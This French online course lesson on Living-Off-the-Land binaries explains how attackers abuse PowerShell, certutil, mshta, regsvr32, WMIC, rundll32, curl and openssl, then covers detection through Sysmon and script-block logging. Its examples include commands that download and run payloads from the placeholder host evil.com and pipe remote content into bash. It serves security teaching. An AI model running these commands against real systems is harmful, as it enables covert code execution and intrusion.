Binaires Living-Off-the-Land (LOLBins)
Utilisez des binaires Windows de confiance (certutil, mshta, regsvr32) pour échapper à la détection.
Binaires Living-Off-the-Land (LOLBins) est une leçon Cyber Security Academy gratuite sur CoddyKit. Ceci est la leçon 2 sur 4. Tu peux lire la leçon complète ci-dessous gratuitement — puis la pratiquer en direct dans le navigateur avec un éditeur de code intégré et un tuteur IA 24/7. Elle fait partie du parcours d'apprentissage Cyber Security Academy, et ta progression se synchronise sur le web et l'application CoddyKit. Le cours Cyber Security Academy comprend 4 leçons au total.
Que sont les binaires LOL ?
Les binaires issus de l’environnement existant (LOLBins) sont des binaires et outils légitimes du système d’exploitation détournés par des attaquants pour effectuer des actions malveillantes. Comme il s’agit d’outils système approuvés et signés, ils contournent souvent la liste blanche des applications et réduisent la détection par les solutions AV/EDR.
Pourquoi les binaires LOL sont efficaces
Avantages pour les attaquants :
- Toujours présents sur les systèmes cibles : il n’est pas nécessaire de déposer de nouveaux fichiers
- Signés par Microsoft ou Apple : contournement de la détection fondée sur les signatures
- Considérés comme fiables par les solutions de liste blanche des applications
- Génèrent des arborescences de processus à l’apparence légitime
PowerShell comme binaire LOL
PowerShell est le binaire LOL le plus détourné. Les attaquants utilisent :
# Download and execute from memory:
powershell -enc BASE64_ENCODED_COMMAND
powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1')"certutil
certutil.exe est un outil Windows de gestion des certificats qui peut télécharger des fichiers :
# Download file to disk:
certutil -urlcache -split -f http://evil.com/payload.exe C:\temp\payload.exe
# Base64 decode:
certutil -decode encoded.b64 decoded.exemshta et wscript
Exécution de scripts via des hôtes approuvés :
# mshta: execute HTA application from URL
mshta http://evil.com/payload.hta
# wscript: execute VBScript/JScript
wscript //E:VBScript evil.vbs
# cscript: console script host
cscript //nologo payload.jsregsvr32 Squiblydoo
regsvr32.exe peut charger et exécuter des DLL depuis des URL distantes au moyen des indicateurs /s /n /u /i : cela contourne AppLocker et exécute du code non signé dans un processus approuvé :
regsvr32 /s /n /u /i:http://evil.com/payload.sct scrobj.dllExécution avec WMIC et WMI
Windows Management Instrumentation exécute du code à distance et localement :
# Execute command via WMI:
wmic process call create "powershell.exe -enc PAYLOAD"
# Remote execution:
wmic /node:TARGET process call create "cmd.exe /c payload.exe"Rundll32
rundll32.exe charge et exécute les points d’entrée des DLL :
# Execute a DLL export:
rundll32 evil.dll,EntryPoint
# Run JavaScript via rundll32:
rundll32 javascript:"\..\mshtml,RunHTMLApplication " payloadBinaires LOL sous Linux
Équivalents sous Linux :
# curl/wget for downloads:
curl http://evil.com/payload | bash
# Python for execution:
python3 -c "import os; os.system('whoami')"
# OpenSSL for file transfer:
openssl s_client -quiet -connect evil.com:443 | bash
# Find LOLBins: gtfobins.github.ioLOLBAS et GTFOBins
Bases de données de référence :
- LOLBAS (lolbas-project.github.io) — binaires, scripts et bibliothèques Windows
- GTFOBins (gtfobins.github.io) — binaires Linux/macOS pour l’exploitation, la lecture et l’écriture de fichiers et l’élévation via SUID
Détection de l’utilisation abusive des binaires LOL
Stratégies de détection :
- Journalisation des blocs de script PowerShell (EventID 4104) — journalise les commandes décodées
- Sysmon EventID 1 : création de processus avec la chaîne de processus parents
- Déclencher une alerte en cas de relation parent-enfant inattendue : Word → PowerShell, Excel → cmd
- Connexions réseau provenant de certutil, mshta ou powershell
- Référentiels UEBA pour signaler l’utilisation anormale des binaires
Vérification rapide : binaires LOL
Quel binaire Windows peut télécharger un fichier distant avec l’indicateur -urlcache ?
Récapitulatif de la leçon
Les binaires LOL sont des outils légitimes du système d’exploitation détournés à des fins malveillantes : PowerShell, certutil, mshta, regsvr32, rundll32 et WMIC sous Windows ; curl, python et openssl sous Linux. Ils contournent la détection fondée sur les signatures et les listes blanches d’applications. La détection nécessite la journalisation de la création des processus (Sysmon), la journalisation des blocs de script PowerShell et des référentiels comportementaux. LOLBAS et GTFOBins sont des bases de données de référence essentielles.
Questions Fréquemment Posées
La leçon « Binaires Living-Off-the-Land (LOLBins) » est-elle gratuite ?
Oui — le texte complet de « Binaires Living-Off-the-Land (LOLBins) » est gratuit à lire ici sur le web. Pour la pratiquer de manière interactive (un éditeur de code intégré et un tuteur IA 24/7) et déverrouiller le reste du cours Cyber Security Academy, passe à CoddyKit PRO. Le cours Cyber Security Academy comprend 4 leçons au total.
Qu'est-ce que j'apprendrai dans « Binaires Living-Off-the-Land (LOLBins) » ?
Utilisez des binaires Windows de confiance (certutil, mshta, regsvr32) pour échapper à la détection. Tu pratiques Cyber Security Academy avec du code pratique que tu exécutes directement dans le navigateur, et un tuteur IA 24/7 répond à tes questions au fur et à mesure que tu avances dans la leçon.
Dois-je avoir de l'expérience pour commencer Cyber Security Academy ?
Aucune expérience préalable n'est requise. Cyber Security Academy sur CoddyKit est structuré pour les débutants jusqu'aux apprenants avancés, donc tu peux commencer ici ou depuis le début et avancer à ton rythme. Ceci est la leçon 2 sur 4.
Combien de temps prend la leçon « Binaires Living-Off-the-Land (LOLBins) » ?
La plupart des leçons CoddyKit prennent environ 5–10 minutes. Chacune est courte et interactive, tu progresses régulièrement et tu repiques exactement où tu t'es arrêté sur le web et l'app.
Peux-tu écrire et exécuter du code dans cette leçon Cyber Security Academy ?
Oui. Chaque leçon Cyber Security Academy inclut un éditeur de code intégré, tu écris et exécutes du vrai code directement dans ton navigateur et tu reçois des retours IA instantanés — aucune configuration locale requise.
Toutes les leçons de ce cours
- Cadres C2 : Cobalt Strike et Sliver
- Binaires Living-Off-the-Land (LOLBins)
- Techniques de déplacement latéral
- Rédaction de rapports d’équipe rouge